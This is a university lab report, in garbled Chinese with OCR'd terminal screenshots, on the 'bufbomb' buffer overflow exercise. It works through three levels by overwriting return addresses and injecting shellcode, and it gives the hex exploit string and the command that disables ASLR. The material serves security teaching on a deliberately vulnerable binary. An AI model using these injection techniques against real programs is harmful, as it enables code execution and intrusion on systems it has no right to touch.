試驗(yàn)4緩沖區(qū)溢出攻擊試驗(yàn)

1、深圳大學(xué)實(shí)驗(yàn)報告課程名稱：計算機(jī)系統(tǒng)（2）實(shí)驗(yàn)項目名稱：緩沖區(qū)溢出攻擊實(shí)驗(yàn)學(xué)院：計算機(jī)與軟件學(xué)院專業(yè)：指導(dǎo)教師：羅秋明報告人：學(xué)號：班級：實(shí)驗(yàn)時間：2017年5月12日實(shí)驗(yàn)報告提交時間：2017年5月31日教務(wù)處制一、實(shí)驗(yàn)?zāi)繕?biāo):.理解程序函數(shù)調(diào)用中參數(shù)傳遞機(jī)制；.掌握緩沖區(qū)溢出攻擊方法；.進(jìn)一步熟練掌握GDB調(diào)試工具和objdump反匯編工具。二、實(shí)驗(yàn)環(huán)境：計算機(jī)(Intel CPU)Linux32 位操作系統(tǒng)(Ubuntu16.04)GDB調(diào)試工具objdump反匯編工具三、實(shí)驗(yàn)內(nèi)容本實(shí)驗(yàn)設(shè)計為一個黑客利用緩沖區(qū)溢出技術(shù)進(jìn)行攻擊的游戲。我們僅給黑客(同學(xué))提供一個二進(jìn)制可執(zhí)行文件bufbom

2、b和部分函數(shù)的 C代碼，不提供每個關(guān)卡的源代碼。程序運(yùn)行中有3個關(guān)卡，每個關(guān)卡需要用戶輸入正確的緩沖區(qū)內(nèi)容，否則無法通過管卡！要求同學(xué)查看各關(guān)卡的要求，運(yùn)用GDB調(diào)試工具和 objdump反匯編工具，通過分析匯編代碼和相應(yīng)的棧幀結(jié)構(gòu)，通過緩沖區(qū)溢出辦法在執(zhí)行了getbuf()函數(shù)返回時作攻擊，使之返回到各關(guān)卡要求的指定函數(shù)中。第一關(guān)只需要返回到指定函數(shù)，第二關(guān)不僅返回到指定函數(shù)還需要為該指定函數(shù)準(zhǔn)備好參數(shù)，最后一關(guān)要求在返回到指定函數(shù)之前執(zhí)行一段匯編代碼完成全局變量的修改。實(shí)驗(yàn)代碼bufbomb和相關(guān)工具(sendstring/makecookie)的更詳細(xì)內(nèi)容請參考“實(shí)驗(yàn)四 緩沖區(qū)溢出攻擊實(shí)

3、驗(yàn) .pptx本實(shí)驗(yàn)要求解決關(guān)卡 1、2、3,給出實(shí)驗(yàn)思路，通過截圖把實(shí)驗(yàn)過程和結(jié)果寫在實(shí)驗(yàn)報 告上。四、實(shí)驗(yàn)步驟和結(jié)果首先是 makecookie:深圳大學(xué)學(xué)生實(shí)驗(yàn)報告用紙yanglibin_2014E)49329(ubuntu sudo susudo passu d for ydngltbin_2O1404OJ29;root0ubuntu：/hohe/yangltbtn_2614040329* cd Desktop/rootfubuntui/hene/yanglibin_2914040129/0esktop# file nakecookie nakecookie; ELF 12 bit L

4、SB executable, Intel 80366, version 1 (SYS v), dynamically linked, Interpreter /ltb/ld-Ltnux *so.z( for gnu/lI nux 2*6.9* not strippedrootubuntu:/hQme/yanglibi.n_2 014O4O3 29/DesktDp# chnod -x nakecooki erootjjubuntu:/hoFie/yanqlibtn 2Q14040329/Desktop# ./Hkecookte ylb0 x239772dSOQtubuntu;/hQFiu/van

5、glibin_Z0140403W9/OcktCfp# |步驟1返回到smoke()解題思路步驟1是要修改getbuf()的返回地址，在執(zhí)行完getbuf()后不是返回到原來的調(diào)用 者test(),而是跳到一個叫做smoke()的函數(shù)里。只需構(gòu)造一段字符串讓 Gets(論部拷貝到buf數(shù)組了，從而造成緩沖區(qū)溢出。同 時最重要的一點(diǎn)是：將smoke()函數(shù)的初始地址也放到構(gòu)造的字符串內(nèi)，使其恰 好覆蓋到 getbuf()的 return address置。解題過程首先要知道smoke()的初始地址，用objdump查看符號表Ig34齷60gF* Let03 州。84Hf Liz9*ABS*eooo

6、eoeo_cdatsqgF.text80006909.hidden _16B6.get_pj. diriI11chidden _glq3 0894a9eeg0BAI OFFSFTTflBLF.g*ABS*eBQD6B09FllidU-P U J XJ k oftaeoooef*UNO*60000043mtfHiettlGLIE_2.61 oao4didO90e&aoee04stdlnefGUK_2,fi aeGeoeoeaF*UND*AB5*0BMSS328BO08BOOfopenWCLIBC?.1 _tnltarrayitartKg0,bsseaeoeae4optirgfG LIBC.2SI

7、 電 1 ed0.Wmt 號0000054_I0_5tdtn_usB9m 03960906F*UIMD*69906066sr jridaEppGLi BU 2.0 00906906f*UN0*60006031sptntfGLIBC 2.01 09000900F*UMemoifidfwriteeGLiet_2,.S_ 由總色4臺勺宮nMat AeoeosBeo eB00B95_data_stjrtia_g#tc 呼l ibcn . eQ RQF D A卜 aeaeaaocyF* Wd LU*UN0*直0000000*UND*eeooeaeo_Jv_RegstrClassesomcooooF*UN

8、D-0990093&_ctpe_b_locCLI6CAgF.rxtbushnndler歸 B34 g eb|gf. textsnake*UH口*60300017rand腌ELISC.。 tea fioae4dijo9bss的的州曲46B6eaes*JND*euot)eb39fllArnfCLiBCZ.eQ9OCQ0OC*UNC*e&oooo9ccdseridGLlHC_2.0F OBOSelOgtexte4D0S4ebang心 eaaeaaoie*UND*_QflOfl_start_；1seessaoFFIND*iTwp 而甑 libLmb深圳大學(xué)學(xué)生實(shí)驗(yàn)報告用紙smoke的初始地址是0 x0

9、8048ebQbuf第一個元素的地址是-0 x18,而return address 第一個字節(jié)的地址是0 x04,兩個位置的相差換算成十進(jìn)制就是0 x04 - (-0 x18) = 4+ 24 = 28。也就是說我們要構(gòu)造28個字符，然后加上smoke()的地址就能準(zhǔn)確覆 蓋至U return address了。最終結(jié)果截圖rootubjritD: / home/yangllvt exploit. txt ?？趖Qubuntu:/home/yangllbin_2014040329/Desktop# */sendstring ott*txt exploit raw.txtrootubjntu :

10、/hnme/yFingli bi n_2614646329/Desktop# cat exploit_raw. tx t | bufbomb -t ylb bufbomb: uqefi舊nd not foundrootQubuntu:/home/yanglibtn 2014e4329/DesktopV cat exploit raw.tx t | ./bufbanb -t ylb Teori： ylb cookie: exz39772dsType strlngiSnoke!: You called smoked NICE JOB JSent validation infornction to

11、grading server 0otBubuntLi:/hQFie/yangllbln_2i4D43Z9/De5ktc# 步驟2返回到fizz()并準(zhǔn)備相應(yīng)參數(shù)解題思路通過objdump-t查看符號表中日zz()函數(shù)的初始地址。拿到了地址 0 x08048e60, 只要用它替換掉之前exploit.raw中smoke()的地址就能讓getbuf()執(zhí)行完畢后返回 到fizz()中。然后用makecookie生成我的用戶名ylb。以getbuf()調(diào)用Gets()為例， 看一下調(diào)用者的代碼和對應(yīng)的棧。解題過程rootubuntui:/e/yangLibtn_2&14046329/sktopft

12、objdunp -s -d z bufboiM) | grep *A15 jrt rnfB948ddO:55push*tebpB&lSddl；39 65i*iov,ebp83 ec 28sub88ad6:Hd 15 c&lea2948a曰1：匚勺1b8 91 CO 白。00nov50乂1,*電考乂8。48a母了：c3ret80Baes:99nopSel8ae9:Sd bA 2b 00 SO 60 60lea8xe(iesLf?(eiz ,13 ,%est修且白4gdFG WenK74If方S648&90 cfizi+3x3e8O48e71:89442494nov3nEax,0 x4(%esp)

13、C7廿424缸9電64 Q8iovl帛。X8 目 49sg電827f9ffffcallprthtfeplt先分析出從getbuf()函數(shù)結(jié)束后，到調(diào)用巾zz()函數(shù)前棧的情況：0 x0c 即將是fizz()棧區(qū)0 x08 即將是fizz()棧區(qū)0 x04 getbuf()的返回地址(即巾zz()的地址)-%esp0 x00 getbuf()%ebp 的保存值得知，在返回并調(diào)用fizz()前，棧指針指向0 x04處(相對getbuf()中的ebp為0 x00),隨后fizz()調(diào)用時,會把fizz() 的ebp值壓入棧中,8048e66: 8b 45 08mov 0 x8(%ebp),%eax8

14、048e69: 3b 05 d4 a1 04 08 cmp 0 x804a1d4,%eax再結(jié)合這兩行代碼得知，fizz()函數(shù)的傳入?yún)?shù)是應(yīng)該存放在 0 x8(%ebp)處的，棧 的情況應(yīng)變?yōu)椋? x0c fizz的傳入?yún)?shù)0 x08巾zz()的返回地址0 x04fizz() 中ebp的保存值NICE JOB!SenL vdllddtlon InTor ftat ton to grading seYt?rYou hzve ncx 兩ail tn ，a/nailfoot步驟3返回至U bang()且修改global_value解題思路因?yàn)槿肿兞颗c代碼不在一個段中，所以我們不能讓緩沖區(qū)一直溢出

15、到.bss段(因?yàn)間lobal_value初始化為0,所以它會被放在.bss而非.data段以節(jié)省空間)覆蓋global_value的值。若修改了 .bss和.text之間某些只讀的段會引起操作系統(tǒng) 的“警覺”而報錯。所以在進(jìn)入bang()之前我們需要執(zhí)行一小段我們自己的代碼 去修改global_value,這一段代碼就叫做 exploit code。解題過程a.bang()和 global_value 地址objdu仲p -t bufb白mbgrep -e bang 電 globalvaluepOOO4olc4 g0 .bss00000004global_vaLuc0804810 gF .

16、text 0000004c_. rootuburitui/hone/yangltbln 20i4O4e3Z9/Desktopi? |得至U bang()的入 口地址 0 x08048e10,以及 global_value 的地址 0 x0804a1c4利用gdb調(diào)試獲得buf字符數(shù)組的首地址，即是注入代碼的首地址gdb bufbomb ;調(diào)試程序disass getbuf ;查看getbuf的匯編代碼深圳大學(xué)學(xué)生實(shí)驗(yàn)報告用紙mw二 jr/rp y % n 1 11 v i (gdb) disass getbufDump of assembler code for function getbuf

17、:0 x08046ad&c+0;puh圾bpOx08048adl;novXe&PfMebp0 xO8948adlc+3 ：sub5flxZ8,%espOx08048d6 ：lea-0 xl8(%ebp,eax0 xd804ead? ：mov%eax,(%esp0 xO894eadc：call6X&489C0 Gx&S04Sael：lea ve0XO8948ae2+18：nov$9xl,%eax0XO8948ae7：retEnd of assembler dump. 篁LL21_給getbuf()設(shè)置斷點(diǎn)，程序把斷點(diǎn)設(shè)置在0 x8048ad6L(gdb) b getbufKBBP Breakpo

18、int 1 at 0 x8O48ad6. (gdb)run寸ylb;運(yùn)行程序p $ebp-0 x18;由 lea -0 x18(%ebp),%eax 分析出 buf 地址為 ebp 地址-0 x18(gdb run *t ylbstarting program: /hone/yangltbtn_zai404O3zy/Desktop/bufbonb -1 yl bTeam: ylbCookie： 0 x239772d53 Breakpoint 1, OxO8048ad6 in getbuf () (gdb) p $ebp-0 xl8$1 - (void *) 0 xbfffb930 (gdb)

19、|得出buf地址，也即注入代碼地址應(yīng)為 0 xbfffb930接下來編寫注入代碼(匯編代碼)：.code32;讓gcc以32位模式來編譯movl $0 x333382e2, 0 x0804a1c4 ;令 global_value = cookie 值pushl $0 x08048e10;%esp - bang入口地址retgcc -c exploit_code.s/編譯匯編文件為可重定位文件.s - .oobjdump -d exploit_code.o/查看可重定位文件的內(nèi)容;ret bang()深圳大學(xué)學(xué)生實(shí)驗(yàn)報告用紙rootfubuntu:/how/argllbtn_Z0i4040j29

20、/esktop* vt explolt_coln_Z014B40U9/Desktopt gcc -c aplolj8d e. 5QOt觥Mntu：/hwefywngllbin 2914040329/Desktop objdunp -d exploit code. oe*(jlott_code nO： file f o r t elfOisftssrnbly of section .text:30000000 ：0：c了 65 C4 31 64 SBnovi $0X333382e27:82 33 33Al63 1& 能 64push$0 x6040410f:elrettgubuntu:/hoff

21、e/yangllbtn_zopi848329，ie5ktop# 最終獲得注入代碼的16進(jìn)制機(jī)器碼，為16字節(jié)。在第1題中返回地址前有28個字節(jié)的空間，故在注入代碼后面仍需補(bǔ)充 12個字節(jié)的空間，為方便計數(shù)定 為01-12,緊接著則是buf的地址，讓getbuf（）返回時跳轉(zhuǎn)到注入代碼的首地址， 按照小端法，buf地址應(yīng)為30 b9 ff ff,故完整字符串為：c7 05 c4 a1 04 08 e2 82 33 3368 10 8e 04 08c301 02 03 04 05 06 07 08 09 10 11 1230 b9 ff bf0d忽略空格（和下劃線）后，得到 exploit3.tx

22、t的內(nèi)容為:c705c4a10408e282333368108e0408c301020304050607080910111230b9ffbf0dLinux內(nèi)存地址有隨機(jī)化機(jī)制，若隨機(jī)化機(jī)制打開，那么每次運(yùn)行程序， %ebp 的地址可能是不一樣的，即buf地址無法確定（注入代碼開始地址無法確定），這樣的話，注入代碼將無法正確編寫。所以需要先關(guān)閉Linux內(nèi)存地址隨機(jī)化機(jī)制，才能完成實(shí)驗(yàn)。可以通過設(shè)置kernel.randomize_va_space內(nèi)核參數(shù)來設(shè)置內(nèi)存地址隨機(jī)化的 行為。# echo 0 /proc/sys/kernel/randomize_va_spaceroot0ubuntu： /hone/yangl-LbJln_2O14040329/Desktop# vi exploit 3. txt rootubuntLi: / hone/yang Li bin_2014040329/Desktopd echo ,fG /proc/s y5/kernel/rahdontze_v*_spacerooiubuniu;/hone/yangllbtn_2014040329/Desktop# |3.3最終結(jié)果截圖rootubuntu7/hane/yanglibin 2014046329/Desktop# cat exploits